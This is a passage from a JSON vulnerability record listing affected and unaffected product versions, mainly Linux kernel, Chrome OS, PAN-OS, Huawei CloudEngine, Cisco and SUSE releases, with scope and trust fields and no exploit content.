        "version": "25.0.1364.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.155"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.38"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.2"
      },
      {
        "model": "vrealize operations 6.2.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "vmware",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "cloudengine v100r006c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.57"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.7.9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "linux enterprise desktop sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.82"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.15"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.70"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.404"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.9"
      },
      {
        "model": "cloudengine v100r005c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.344"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "spa122 analog telephone adapter with router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel 3.8-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "virtuozzo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "virtuozzo",
        "version": "6.0"
      },
      {
        "model": "connected grid routers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "cloudengine v100r003c10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "linux enterprise point of sale 11-sp3",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "linux enterprise server 12-ltss",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.401"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.14"
      },
      {
        "model": "linux enterprise software development kit sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.119"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.54"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.123"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "android one",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.4"
      },
      {
        "model": "email gateway 7.6.405h1165239",
        "scope": null,
        "trust": 0.3,
        "vendor": "mcafee",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "cloudengine v200r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "7800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "kernel 3.19-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "series digital media players",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "44000"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.113"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.60"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.35"
      },
      {
        "model": "ata series analog terminal adaptors",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1900"
      },
      {
        "model": "linux enterprise server sp3 ltss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.40"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux enterprise server for sap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.14"
      },
      {
        "model": "cloudengine v200r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "8800"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.48"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.18"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59007)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.12"
      },
      {
        "model": "unified communications manager session management edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "enterprise linux mrg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.32"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.6"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.24"
      },
      {
        "model": "linux cloudlinuxos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cloud",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5(.1.131)"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.38"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.3"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1153.4"
      },
      {
        "model": "prime access registrar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.62"
      },
      {
        "model": "linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1122.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "moonshot",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.116"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.37"
      },
      {
        "model": "junos space 15.2r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.1"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "16.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1"
      },
      {
        "model": "onepk all-in-one virtual machine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux enterprise debuginfo sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.41"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.71"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.1"
      },
      {
        "model": "linux enterprise workstation extension sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "kernel 3.9-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "fusioncube v100r002c60spc100",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6.1.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "vds-tv vault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloudengine v100r006c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "12800"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "kernel 3.11-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1153.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "hsr6600 (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1183.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.39"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.18"
      },
      {
        "model": "spa232d multi-line dect analog telephone adapter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "chrome os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.79"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.171"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.57"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.79"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.13"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.0.1"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.73"
      },
      {
        "model": "dcm series d990x digital content manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.156"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.3"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "opensuse",
        "version": "42.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "57007)0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.58"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "coreos",
        "version": "1192.2"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.33"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "junos space 14.1r1.9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.154"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.6"
      },
      {
        "model": "linux enterprise server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.172"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "cloudengine v100r003c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "cloudengine v200r001sph002",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "6800"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.14"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "vrealize operations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.152"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "kernel 3.11-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.7"
      },
      {
        "model": "helion cloudsystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.61"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.8"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.403"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "kernel 4.4-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.10"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.0"
      },
      {
        "model": "vsr (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)0"
      },
